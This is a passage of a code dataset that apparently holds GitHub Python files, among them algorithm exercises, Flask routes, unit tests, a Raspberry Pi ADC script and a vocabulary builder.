self.__y}\n","repo_name":"MegaChie/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20811391258","text":"# Uses python3\r\ndef fibonacci_partial_sum_efficient(m, n):\r\n if n <= 1:\r\n return n\r\n\r\n\r\n previous = 0\r\n current = 1\r\n period = 0 # After period move two numbers ahead to check if numbers start from 0 and 1\r\n fib_mod = [0, 1]\r\n i = 2\r\n\r\n while(True):\r\n previous, current = current, previous + current\r\n period = period + 1\r\n fib_mod.append(current % 10)\r\n if fib_mod[i-1] == 0 and fib_mod[i] == 1:\r\n break\r\n i = i + 1\r\n\r\n sum_fib_m = fib_mod[(m + 1) % period] - 1 # Finding the aum of m-1 fibonacci numbers.\r\n sum_fib_n = fib_mod[(n + 2) % period] - 1\r\n diff = sum_fib_n - sum_fib_m\r\n if diff < 0:\r\n return diff + 10\r\n else:\r\n return diff\r\n\r\nif __name__ == '__main__':\r\n inputs = input();\r\n m, n = map(int, inputs.split())\r\n print(fibonacci_partial_sum_efficient(m, n))","repo_name":"asquare24/Algorithm_toolbox","sub_path":"Week_2/fibonacci_partial_sum_final.py","file_name":"fibonacci_partial_sum_final.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39578983435","text":"'''\r\n 문) 동적 멤버 변수 생성으로 다음과 같은 산포도를 구하는 클래스를 정의하시오.\r\n \r\nclass Scattering : \r\n \r\n 생성자 \r\n \r\n 분산 함수(var_func)\r\n var = sum((x - mean)**2) / (n-1)\r\n 표준편차 함수(std_func) \r\n std = sqrt(var)\r\n \r\n << 출력 결과 >>\r\n 분산 : 7.466666666666666\r\n 표준편차 : 2.7325202042558927\r\n'''\r\n\r\nfrom statistics import mean\r\nfrom math import sqrt\r\n\r\n\r\nclass Scattering :\r\n def __init__(self, x):\r\n self.x = x\r\n\r\n def var_func(self):\r\n X = [(i - mean(self.x))**2 for i in self.x]\r\n self.var = (sum(X) / (len(self.x)-1))\r\n def std_func(self):\r\n self.std = sqrt(self.var)\r\n def final(self):\r\n print('분산 : %f \\n' '표준편차 : %f'%(self.var, self.std))\r\n\r\nx = [5, 9, 1, 7, 4, 6]\r\nscattering = Scattering(x)\r\nprint(scattering.x) # [5, 9, 1, 7, 4, 6]\r\nscattering.var_func()\r\nprint(scattering.var)\r\nscattering.std_func()\r\nprint(scattering.std)\r\n\r\nscattering.final()\r\n","repo_name":"yangmyongho/3_Python","sub_path":"chap06_Class_exams/exam02.py","file_name":"exam02.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2327107458","text":"import sys\n\ndef canPawnMoveToEight(chess, i, j):\n if chess[i][j] == \"#\":\n return True\n return False\ndef findPawnAndPositionAtEight(chess):\n eight = chess[0]\n seven = chess[1]\n\n for j, ch in enumerate(seven):\n if ch == 'P' and canPawnMoveToEight(chess, 0, j):\n return 1,j,0,j\n return None, None, None, None\n\ndef findKing(chess):\n for i in range(len(chess)):\n for j in range(len(chess[0])):\n if chess[i][j] == 'k':\n return i,j\n return None, None\n\ndef findDiagonalPosition(kingI, kingJ, i, j):\n if i > kingI:\n if j > kingJ:\n return -1, -1\n else:\n return -1, 1\n else:\n if j > kingJ:\n return 1, -1\n else:\n return 1, 1 \n\ndef queenCanCheckmate(chess, kingI, kingJ, i, j):\n if abs(kingI - i) != abs(kingJ - j) and abs(kingI - i) != 0 and abs(kingJ - j) != 0:\n return False\n\n if abs(kingI - i) == 0:\n start = min(kingJ, j)\n stop = max(kingJ, j)\n for k in range(start + 1, stop):\n if chess[i][k] != '#':\n return False\n return True\n if abs(kingJ - j) == 0:\n start = min(kingI, i)\n stop = max(kingI, i)\n for k in range(start + 1, stop):\n if chess[k][j] != '#':\n return False\n return True\n\n\n m,n = findDiagonalPosition(kingI, kingJ, i, j)\n start = i+m\n stop = j+n\n while start != kingI and stop != kingJ:\n if chess[start][stop] != '#':\n return False\n start += m\n stop += n\n return True\n\n\ndef knightCanCheckmate(chess, kingI, kingJ, i, j):\n if abs(kingI - i) == 2 and abs(kingJ - j) == 1:\n return True\n if abs(kingJ - j) == 2 and abs(kingI - i) == 1:\n return True\n return False \n\n\ndef rookCanCheckmate(chess, kingI, kingJ, i, j):\n if abs(kingI - i) != 0 and abs(kingJ - j) != 0:\n return False\n\n if abs(kingI - i) == 0:\n start = min(kingJ, j)\n stop = max(kingJ, j)\n for k in range(start + 1, stop):\n if chess[i][k] != '#':\n return False\n return True\n \n start = min(kingI, i)\n stop = max(kingI, i)\n for k in range(start + 1, stop):\n if chess[k][j] != '#':\n return False\n return True\n\ndef bishopCanCheckmate(chess, kingI, kingJ, i, j):\n if abs(kingI - i) != abs(kingJ - j):\n return False\n\n m,n = findDiagonalPosition(kingI, kingJ, i, j)\n start = i+m\n stop = j+n\n while start != kingI and stop != kingJ:\n if chess[start][stop] != '#':\n return False\n start += m\n stop += n\n return True\n\ndef isCheckmate(chess, kingI, kingJ):\n n = len(chess)\n m = len(chess[0])\n for i in range(n):\n for j in range(m):\n if chess[i][j] == 'Q':\n if queenCanCheckmate(chess, kingI, kingJ, i, j):\n return True\n if chess[i][j] == 'N':\n if knightCanCheckmate(chess, kingI, kingJ, i, j):\n return True\n if chess[i][j] == 'R':\n if rookCanCheckmate(chess, kingI, kingJ, i, j):\n return True\n if chess[i][j] == 'B':\n if bishopCanCheckmate(chess, kingI, kingJ, i, j):\n return True\n return False\ndef solve(chess):\n oldI, oldJ, i, j = findPawnAndPositionAtEight(chess)\n if i == None:\n return -1\n kingI, kingJ = findKing(chess)\n if kingI == None:\n return -1\n\n c = 0\n chess[oldI][oldJ] = '#'\n for m in ['Q', 'N', 'R', 'B']:\n chess[i][j] = m\n if isCheckmate(chess, kingI, kingJ):\n c += 1\n return c\n\n\nt = int(sys.stdin.readline())\nfor _ in range(t):\n chess = []\n for _ in range(8):\n line = list(sys.stdin.readline().strip())\n chess.append(line)\n\n print(solve(chess))","repo_name":"lebahoang/cp","sub_path":"hrk/week36/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39970297552","text":"\"\"\"\nTests requiring internet connection are treated as if they are big data tests.\nWe could use pytest-remotedata plugin but requiring another plugin to test\na plugin package is a little too meta.\n\"\"\"\nimport json\nimport os\n\nimport pytest\n\nfrom ci_watson.artifactory_helpers import (\n HAS_ASTROPY, BigdataError, get_bigdata_root, get_bigdata,\n check_url, compare_outputs, generate_upload_params, generate_upload_schema)\n\n\n@pytest.mark.bigdata\n@pytest.mark.parametrize(\n ('val', 'ans'),\n [('/local/path', False),\n ('https://google.com', True),\n ('https://github.com/spacetelescopehstcalblahblah', False)])\ndef test_check_url(val, ans):\n assert check_url(val) is ans\n\n\nclass TestBigdataRoot:\n def setup_class(self):\n self.key = 'FOOFOO'\n\n def teardown_class(self):\n if self.key in os.environ:\n del os.environ[self.key]\n\n def test_no_env(self):\n if self.key in os.environ:\n del os.environ[self.key]\n with pytest.raises(BigdataError):\n get_bigdata_root(envkey=self.key)\n\n @pytest.mark.bigdata\n def test_has_env_url(self):\n path = 'https://google.com'\n os.environ[self.key] = path\n assert get_bigdata_root(envkey=self.key) == path\n\n def test_has_env_local(self):\n path = os.path.abspath(os.curdir)\n os.environ[self.key] = path\n assert get_bigdata_root(envkey=self.key) == path\n\n def test_no_path(self):\n os.environ[self.key] = '/some/fake/path'\n assert get_bigdata_root(envkey=self.key) is None\n\n\n@pytest.mark.bigdata\nclass TestGetBigdata:\n def setup_class(self):\n self.root = get_bigdata_root()\n\n def test_nocopy(self, _jail, pytestconfig):\n args = (pytestconfig.getini('inputs_root')[0],\n 'dev',\n 'input',\n 'j6lq01010_asn.fits')\n dest = get_bigdata(*args, docopy=False)\n assert dest == os.path.abspath(os.path.join(self.root, *args))\n assert len(os.listdir()) == 0\n\n @pytest.mark.parametrize('docopy', [True, False])\n def test_no_data(self, docopy):\n with pytest.raises(BigdataError):\n get_bigdata('fake', 'path', 'somefile.txt', docopy=docopy)\n\n def test_get_data(self, _jail, pytestconfig):\n \"\"\"\n This tests download when TEST_BIGDATA is pointing to Artifactory.\n And tests copy when it is pointing to local path.\n \"\"\"\n args = (pytestconfig.getini('inputs_root')[0],\n 'dev',\n 'input',\n 'j6lq01010_asn.fits')\n dest = get_bigdata(*args)\n assert dest == os.path.abspath(os.path.join(os.curdir, args[-1]))\n\n\n@pytest.mark.bigdata\n@pytest.mark.usefixtures('_jail')\n@pytest.mark.skipif(not HAS_ASTROPY, reason='requires astropy to run')\nclass TestCompareOutputs:\n \"\"\"\n Test a few common comparison scenarios.\n\n FITSDiff and HDUDiff are tested in Astropy, so here we simply\n test if they report differences or not, but we do not check\n the content too closely.\n\n .. note:: Upload schema functions are tested separately elsewhere.\n\n \"\"\"\n def setup_class(self):\n self.inpath = ('ci-watson', 'dev', 'input')\n\n if os.environ.get('TEST_BIGDATA').startswith('http'):\n self.copy = True\n else:\n self.copy = False\n\n def test_raise_error_fits(self):\n \"\"\"Test mismatched extensions from the same file.\"\"\"\n get_bigdata(*self.inpath, 'j6lq01010_asn.fits', docopy=True)\n outputs = [('j6lq01010_asn.fits[PRIMARY]', 'j6lq01010_asn.fits[asn]')]\n with pytest.raises(AssertionError) as exc:\n compare_outputs(outputs, input_path=self.inpath,\n docopy=self.copy, verbose=False)\n assert 'Headers contain differences' in str(exc)\n\n def test_difference_ascii(self):\n \"\"\"\n Test ASCII with differences but suppress error to inspect\n returned report.\n \"\"\"\n get_bigdata(*self.inpath, 'j6lq01010_asn_mod.txt', docopy=True)\n report = compare_outputs(\n [('j6lq01010_asn_mod.txt', 'j6lq01010_asn.txt')],\n input_path=self.inpath, docopy=self.copy, verbose=False,\n raise_error=False)\n s = report.split(os.linesep)\n assert s[2:] == ['@@ -1,4 +1,4 @@',\n ' # MEMNAME MEMTYPE MEMPRSNT',\n '-J6LQ01NAQ EXP-CRJ 2',\n '+J6LQ01NAQ EXP-CRJ 1',\n ' J6LQ01NDQ EXP-CRJ 1',\n '-J6LQ01013 PROD-RPT 1',\n '+J6LQ01011 PROD-CRJ 1',\n '']\n\n @pytest.mark.parametrize(\n 'filename', ['j6lq01010_asn.fits', 'j6lq01010_asn.txt'])\n def test_all_okay(self, filename):\n \"\"\"Same file has no difference.\"\"\"\n get_bigdata(*self.inpath, filename, docopy=True)\n report = compare_outputs(\n [(filename, filename)], input_path=self.inpath,\n docopy=self.copy, verbose=False)\n assert 'No differences found' in report\n\n @pytest.mark.parametrize('docopy', [False, True])\n def test_truth_missing(self, docopy):\n get_bigdata(*self.inpath, 'j6lq01010_asn.fits', docopy=True)\n with pytest.raises(AssertionError) as exc:\n compare_outputs(\n [('j6lq01010_asn.fits', 'doesnotexist.fits')],\n input_path=self.inpath, docopy=docopy, verbose=False)\n assert 'Cannot find doesnotexist.fits' in str(exc)\n\n @pytest.mark.parametrize(\n 'outputs',\n [[('j6lq01010_asn.fits[ASN]', 'j6lq01010_asn_mod.fits', ['image'])],\n [('j6lq01010_asn.fits', 'j6lq01010_asn_mod.fits[ASN]', ['image'])]])\n def test_ambiguous_extlist(self, outputs):\n \"\"\"Too many ways to do the same thing.\"\"\"\n get_bigdata(*self.inpath, 'j6lq01010_asn.fits', docopy=True)\n with pytest.raises(AssertionError) as exc:\n compare_outputs(outputs, input_path=self.inpath, docopy=self.copy,\n verbose=False)\n assert 'Ambiguous extension requirements' in str(exc)\n\n def test_mixed_bunch(self):\n \"\"\"\n Test different forms of acceptable ``outputs``.\n\n .. note:: Some other crazy combos are theoretically possible given\n the logic but they are not officially supported, hence\n not tested here. Add new combo as its support is added.\n\n \"\"\"\n for filename in ('j6lq01010_asn.fits', 'j6lq01010_asn.txt'):\n get_bigdata(*self.inpath, filename, docopy=True)\n\n outputs = [('j6lq01010_asn.fits', 'j6lq01010_asn.fits'),\n ('j6lq01010_asn.fits[asn]', 'j6lq01010_asn.fits[ASN]'),\n {'files': ('j6lq01010_asn.fits[image]',\n 'j6lq01010_asn_mod.fits[IMAGE]'),\n 'pars': {'rtol': 1e-7, 'atol': 0.05}},\n {'files': ('j6lq01010_asn.fits',\n 'j6lq01010_asn_mod.fits',\n ['image']),\n 'pars': {'rtol': 1e-7, 'atol': 0.05}},\n {'files': ('j6lq01010_asn.txt', 'j6lq01010_asn.txt')},\n ('j6lq01010_asn.fits', 'j6lq01010_asn_mod.fits',\n ['primary', 'IMAGE']),\n ('j6lq01010_asn.txt', 'j6lq01010_asn.txt')]\n report = compare_outputs(\n outputs, input_path=self.inpath, docopy=self.copy,\n verbose=False, raise_error=False)\n\n # There are 7 comparisons, and only 1 should show a difference\n assert report.count(\"No differences found\") == 6\n assert report.count(\"different pixels found\") == 1\n\n\nclass TestGenerateUploadParams:\n def setup_class(self):\n self.old_envs = {}\n for key in ('BUILD_TAG', 'BUILD_MATRIX_SUFFIX'):\n self.old_envs[key] = os.environ.get(key)\n\n # Set up something reproducible\n os.environ['BUILD_TAG'] = 'tag0'\n os.environ['BUILD_MATRIX_SUFFIX'] = 'foo'\n\n def teardown_class(self):\n for key, val in self.old_envs.items():\n if val is None:\n del os.environ[key]\n else:\n os.environ[key] = val\n\n def test_gen(self, _jail):\n # Dummy file to move.\n datafile = 'actual.txt'\n with open(datafile, 'w') as f:\n f.write('\\n')\n\n updated_outputs = [(datafile, '/path/to/desired.txt')]\n schema_pattern, tree, testname = generate_upload_params(\n 'groot', updated_outputs, verbose=False)\n\n assert schema_pattern == ['*.log', os.path.abspath('desired.txt')]\n assert isinstance(testname, str) # Actual value non-deterministic\n\n # TODO: Use regex?\n split_tree = tree.split(os.sep)\n assert split_tree[0] == 'groot'\n assert split_tree[1].endswith('_tag0_foo')\n assert split_tree[3] == ''\n\n # Make sure file is moved properly.\n dirlist = os.listdir()\n assert dirlist == ['desired.txt']\n\n\ndef test_generate_upload_schema_multi(_jail):\n generate_upload_schema(\n ['*.log', 'desired.txt'], 'reponame/repopath', 'foo')\n # TODO: Better way to compare JSON?\n with open('foo_results.json') as f:\n j = json.load(f)\n assert json.dumps(j, indent=4, sort_keys=True).split(os.linesep) == [\n '{',\n ' \"files\": [',\n ' {',\n ' \"excludePatterns\": [],',\n ' \"explode\": \"false\",',\n ' \"flat\": \"true\",',\n ' \"pattern\": \"*.log\",',\n ' \"props\": null,',\n ' \"recursive\": \"false\",',\n ' \"regexp\": \"false\",',\n ' \"target\": \"reponame/repopath\"',\n ' },',\n ' {',\n ' \"excludePatterns\": [],',\n ' \"explode\": \"false\",',\n ' \"flat\": \"true\",',\n ' \"pattern\": \"desired.txt\",',\n ' \"props\": null,',\n ' \"recursive\": \"false\",',\n ' \"regexp\": \"false\",',\n ' \"target\": \"reponame/repopath\"',\n ' }',\n ' ]',\n '}']\n\n\ndef test_generate_upload_schema_one(_jail):\n generate_upload_schema(\n 'desired.txt', 'reponame/repopath', 'foo', recursive=True)\n # TODO: Better way to compare JSON?\n with open('foo_results.json') as f:\n j = json.load(f)\n assert json.dumps(j, indent=4, sort_keys=True).split(os.linesep) == [\n '{',\n ' \"files\": [',\n ' {',\n ' \"excludePatterns\": [],',\n ' \"explode\": \"false\",',\n ' \"flat\": \"true\",',\n ' \"pattern\": \"desired.txt\",',\n ' \"props\": null,',\n ' \"recursive\": \"true\",',\n ' \"regexp\": \"false\",',\n ' \"target\": \"reponame/repopath\"',\n ' }',\n ' ]',\n '}']\n","repo_name":"spacetelescope/ci_watson","sub_path":"tests/test_artifactory_helpers.py","file_name":"test_artifactory_helpers.py","file_ext":"py","file_size_in_byte":10989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34901877654","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 22 13:49:13 2018\n\n@author: Kel3vra\n\"\"\"\n\nimport pickle\n\n\nfile = open(\"Tf-IDF.pickle\",'rb')\nobject_file = pickle.load(file)\n\nprint(object_file)\n\n","repo_name":"Athaagra/Txt_Classification_Sparse_Data","sub_path":"read_pickle.py","file_name":"read_pickle.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72767793192","text":"import numexpr as ne\r\nimport random\r\nimport matplotlib.pyplot as plt\r\n\r\ndef randomColor():\r\n return \"#\" + ''.join([random.choice('0123456789ABCDEF') for j in range(6)])\r\n\r\ndef genPointsForLine(xStart, xEnd, pol):\r\n X, Y = [], []\r\n x = xStart\r\n while x <= xEnd:\r\n Y.append(pol.findValue(x=x))\r\n X.append(x)\r\n x += (xEnd - xStart) / 50\r\n\r\n return X, Y\r\n\r\n\r\ndef showPol(table, newton, spline_0_0, spline_P_0, spline_P_P):\r\n xStart = table.x[0]\r\n xEnd = table.x[-1]\r\n\r\n NX, NY = genPointsForLine(xStart, xEnd, newton)\r\n S00X, S00Y = genPointsForLine(xStart, xEnd, spline_0_0)\r\n SP0X, SP0Y = genPointsForLine(xStart, xEnd, spline_P_0)\r\n SPPX, SPPY = genPointsForLine(xStart, xEnd, spline_P_P)\r\n\r\n plt.plot(table.x, table.y, 'mo', label='Start points')\r\n plt.plot(NX, NY, randomColor(), label='Newton')\r\n plt.plot(S00X, S00Y, randomColor(), label='Spline 0 0')\r\n plt.plot(SP0X, SP0Y, randomColor(), label='Spline P 0')\r\n plt.plot(SPPX, SPPY, randomColor(), label='Spline P P')\r\n\r\n plt.legend()\r\n ax = plt.gca()\r\n ax.spines['left'].set_position('center')\r\n ax.spines['bottom'].set_position('center')\r\n ax.spines['top'].set_visible(False)\r\n ax.spines['right'].set_visible(False)\r\n\r\n plt.show()\r\n\r\n","repo_name":"Tulenenok/BMSTU","sub_path":"Сomputational algorithms/lab_03/view/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"71356373034","text":"import json\n\nfrom flask import Blueprint, request\n\nfrom utils.db import get_db_connection\nfrom utils.message import send_message\n\ndata_cleaning = Blueprint(\"data-cleaning\", __name__)\n\n\n@data_cleaning.route(\"/\", methods=[\"POST\"])\ndef index():\n data = request.data\n\n try:\n job = str(json.loads(data)[\"job-id\"])\n except:\n return \"Invalid JSON\", 400\n\n try:\n db = get_db_connection()\n except:\n return \"Internal server error\", 500\n\n collection = db[\"Diastema\"][\"DataCleaning\"]\n match = collection.find_one({\"job-id\": job})\n\n if match:\n db.close()\n return \"Job ID already exists\", 400\n\n collection.insert_one({ \"job-id\": job, \"status\": \"progress\", \"result\": \"\" })\n db.close()\n\n try:\n send_message(\"data-cleaning\", data)\n except:\n return \"Failed to submit Data Cleaning job\", 500\n\n return \"Data Cleaning job submitted\", 200\n\n\n@data_cleaning.route(\"/progress\", methods=[\"GET\"])\ndef data_cleaning_progress():\n job = request.args.get(\"id\")\n\n if not job:\n return \"Missing ID argument\", 400\n\n try:\n db = get_db_connection()\n except:\n return \"Internal server error\", 500\n\n collection = db[\"Diastema\"][\"DataCleaning\"]\n match = collection.find_one({\"job-id\": job})\n db.close()\n\n if not match:\n return \"Job ID doesn't exist\", 404\n\n return match[\"status\"], 200\n\n\n@data_cleaning.route(\"/\", methods=[\"GET\"])\ndef data_cleaning_job(job):\n try:\n db = get_db_connection()\n except:\n return \"Internal server error\", 500\n\n collection = db[\"Diastema\"][\"DataCleaning\"]\n match = collection.find_one({\"job-id\": job})\n\n if not match:\n return \"Job ID doesn't exist\", 404\n\n return match[\"result\"], 200\n","repo_name":"konvoulgaris/diastema","sub_path":"daas-api/src/routes/data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"11466495349","text":"__author__ = 'vcaen'\nfrom lyontour import api, app\nfrom flask.ext.restful import Resource\nfrom lyontour.model.tour_manager import Tour\nfrom lyontour.model.filter_manager import filter_manager\nfrom flask import Flask, request\n\n\ntodos = {}\n\n\n@app.route('/tour', methods=['POST', 'GET'])\ndef Test():\n if(request.method == 'POST'):\n\n return (Tour(request.form['datedebut'], request.form['datefin'], list)).toString()\n else:\n filtres = request.args.get('filtre')\n if filtres is None:\n list = {}\n else:\n list = str(request.args.get('filtre')).split(',')\n return (Tour(request.args.get('datedebut'),request.args.get('datefin'), list)).toString()\n\n# @app.route('/')\n# def Test():\n# tour = Tour('2015-06-04','2015-06-10')\n# liste_jours = tour.getJours()\n# filtre_user = ['shops', 'arts']\n# filtre_manager = filter_manager()\n# attractions = filtre_manager.getAttractionFiltred(liste_jours, filtre_user)\n# print(\"Hello World\")\n# print ('%s',str(attractions))\n# return (str(attractions))\n","repo_name":"vcaen/lyon-tour","sub_path":"src/lyontour/views/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31293823608","text":"import unittest\nfrom meta_class import CustomMeta\n\n\nclass CustomClass(metaclass=CustomMeta):\n x = 50\n\n def __init__(self, val=99):\n self.val = val\n\n def line(self):\n return 100\n\n def __str__(self):\n return \"Custom_by_metaclass\"\n\n\nclass TestMetaClass(unittest.TestCase):\n\n def setUp(self):\n self.ob = CustomClass()\n print('Set up')\n\n def tearDown(self):\n print('Tear down')\n\n def test_class_attrs(self):\n self.assertEqual(CustomClass.custom_x, 50)\n CustomClass.custom_line\n CustomClass.__init__\n with self.assertRaises(Exception):\n CustomClass.new_attr\n CustomClass.custom_new_attr\n CustomClass.new_attr = 0\n self.assertEqual(CustomClass.custom_new_attr, 0)\n CustomClass.new_attr = 5\n self.assertEqual(CustomClass.custom_new_attr, 5)\n CustomClass.custom_new_attr = 0\n self.assertEqual(CustomClass.custom_new_attr, 0)\n CustomClass.custom_new_attr\n\n CustomClass.__attr = 'string'\n with self.assertRaises(Exception):\n CustomClass.__attr\n self.assertEqual(CustomClass.custom__TestMetaClass__attr, 'string')\n\n self.assertEqual(CustomClass.custom_line(self.ob), 100)\n\n def test_ob_attrs(self):\n self.assertEqual(self.ob.custom_x, 50)\n self.assertEqual(self.ob.custom_val, 99)\n self.ob.custom_line\n self.assertEqual(self.ob.custom_line(), 100)\n self.ob.__init__\n with self.assertRaises(Exception):\n self.ob.new_attr\n self.ob.custom_new_attr\n self.ob.new_attr = 0\n self.assertEqual(self.ob.custom_new_attr, 0)\n self.ob.new_attr = 5\n self.assertEqual(self.ob.custom_new_attr, 5)\n self.ob.custom_new_attr = 0\n self.assertEqual(self.ob.custom_new_attr, 0)\n self.ob.custom_new_attr\n\n self.ob._attr = {'string': 120}\n with self.assertRaises(Exception):\n self.ob.__attr\n self.assertEqual(self.ob.custom__attr, {'string': 120})\n\n self.ob.__attr = 'string'\n with self.assertRaises(Exception):\n self.ob.__attr\n self.assertEqual(self.ob.custom__TestMetaClass__attr, 'string')\n\n self.assertEqual(self.ob.custom_line(), 100)\n self.assertEqual(str(self.ob), 'Custom_by_metaclass')\n","repo_name":"DSFed8889/msu_deep_python_spring_2022","sub_path":"04/test_meta_class.py","file_name":"test_meta_class.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41861558642","text":"import os\nfrom setuptools import setup\n\nhere = os.path.abspath(os.path.dirname(__file__))\nread_file = lambda filename: open(os.path.join(here, filename)).read()\nread_requirements = lambda filename: read_file(filename).splitlines()\n\n# Stops exit traceback on tests\ntry:\n import multiprocessing\nexcept:\n pass\n\ntest_requirements = [\n 'nose'\n]\n\nsetup(\n name='Flask-MongoRest',\n version='0.1.1',\n url='http://github.com/elasticsales/flask-mongorest',\n license='BSD',\n author='Anthony Nemitz',\n author_email='anemitz@gmail.com',\n maintainer='Anthony Nemitz',\n maintainer_email='anemitz@gmail.com',\n description='Flask restful API framework for MongoDB/MongoEngine',\n long_description=read_file('README.md'),\n packages=[\n 'flask_mongorest',\n ],\n package_data={\n 'flask_mongorest': ['templates/mongorest/*']\n },\n test_suite='nose.collector',\n zip_safe=False,\n platforms='any',\n install_requires=read_requirements('requirements.txt'),\n tests_require=test_requirements,\n extras_require={'test': test_requirements},\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ]\n)\n","repo_name":"wuurrd/flask-mongorest","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"39594765485","text":"import RPi.GPIO as GPIO\nimport time\ndac = [26,19,13,6,5,11,9,10]\ncomp = 4\ntroyka = 17\nmaxVoltage = 3.3\nlevels = 256\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(dac,GPIO.OUT)\nGPIO.setup(troyka,GPIO.OUT,initial=GPIO.HIGH)\nGPIO.setup(comp,GPIO.IN)\ndef decimal2binary(value):\n return [int(bit) for bit in bin(value)[2:].zfill(8)]\ndef num2dac(value):\n signal = decimal2binary(value)\n GPIO.output(dac,signal)\n return signal\ndef adc():\n for value in range(256):\n time.sleep(0.005)\n signal =num2dac(value)\n voltage = value/levels*maxVoltage\n time.sleep(0.0001)\n comparatorValue = GPIO.input(comp)\n if (comparatorValue == 0):\n return voltage\n break\ntry:\n while(True):\n print(adc())\nfinally:\n GPIO.output(dac,0)\n #GPIO.output(dac,0)\n GPIO.cleanup()","repo_name":"FastBery/rpi","sub_path":"5 lesson/5-1-adc-simple.py","file_name":"5-1-adc-simple.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34053241743","text":"import psycopg2\n\nconnection = psycopg2.connect('user=postgres dbname=example')\ncur = connection.cursor()\n\ncur.execute('DROP TABLE IF EXISTS table2')\ncur.execute('''\n CREATE TABLE table2(\n id INTEGER PRIMARY KEY,\n completed BOOLEAN NOT NULL DEFAULT FALSE\n );''')\n\nsql = 'INSERT INTO table2(id , completed) values (%(id)s,%(completed)s);'\ndata = {'id':5,'completed':True}\n\ncur.execute(sql,data)\n\ncur.execute('SELECT * FROM table2')\nprint(cur.fetchall())\n\n\nconnection.commit()\nconnection.close()\ncur.close()","repo_name":"Paras2soori/flaskdemo","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70539074793","text":"# 문제 : https://www.acmicpc.net/problem/1106\n\nimport sys\n\ninput = sys.stdin.readline\nINF = 1e9\n\nc, n = map(int, input().split())\ndata = []\n\nmin_cost = [INF] * (c+100)\nmin_cost[0] = 0\n\nfor _ in range(n):\n # cost, cus\n data.append(list(map(int, input().split())))\n\n# cost 순서 작은 순서로 정리\ndata_sort = sorted(data, key = lambda x: x[0])\n\n\nfor cost, cus in data_sort:\n for i in range(cus, c+100):\n min_cost[i] = min(min_cost[i-cus] + cost, min_cost[i])\n\nprint(min(min_cost[c:]))","repo_name":"fbghgus123/algorithm","sub_path":"python/백준/DP/1106_호텔.py","file_name":"1106_호텔.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"943331014","text":"__version__ = '1.0.0-rc.1'\n__author__ = 'Lorenzo Menghini, Martino Pulici, Alessandro Stockman, Luca Zucchini'\n\n\nimport collections\nimport os\n\nimport torchtext\nfrom tqdm import tqdm\n\n\ndef build_vocabulary(df, cols, tokenizer, min_freq=1, save_path=None):\n \"\"\"\n Builds vocabulary.\n\n Parameters\n ----------\n df : pandas.core.frame.DataFrame\n Dataset.\n cols : list\n List of columns.\n tokenizer : transformers.models.bert.tokenization_bert.BasicTokenizer\n Tokenizer.\n min_freq : int, default 1\n Minimum frequency to become part of the vocabulary.\n save_path : str, optional\n Saving path of the vocabulary.\n\n Returns\n -------\n v : torchtext.vocab.Vocab\n Vocabulary.\n tokenizer : transformers.models.bert.tokenization_bert.BasicTokenizer\n Tokenizer.\n\n \"\"\"\n counter = collections.Counter()\n for token in tokenizer.special_tokens_map.values():\n counter[token] = min_freq + 1\n sentences_in_cols = [v for col in cols for v in df[col].values]\n num_sentences = len(sentences_in_cols)\n print(f'Comments count: {num_sentences}')\n print(f'Creating vocabulary from comments...')\n percentage_printed = 0.0\n for index, sentence in enumerate(sentences_in_cols):\n percentage = round(index / num_sentences, 2)\n if percentage == 0.25 and percentage_printed == 0.0:\n print(f'25% vocabulary created')\n percentage_printed = 0.25\n elif percentage == 0.50 and percentage_printed == 0.25:\n print(f'50% vocabulary created')\n percentage_printed = 0.50\n elif percentage == 0.75 and percentage_printed == 0.5:\n print(f'75% vocabulary created')\n percentage_printed = 0.75\n counter.update(tokenizer._tokenize(sentence))\n v = torchtext.vocab.vocab(counter, min_freq=min_freq).get_stoi()\n print(f'Vocabulary created ({len(v)} words)')\n if save_path:\n save_vocabulary(save_path, v)\n return v, tokenizer\n\n\ndef get_preprocess_filenames(pipelines, vocab_file, 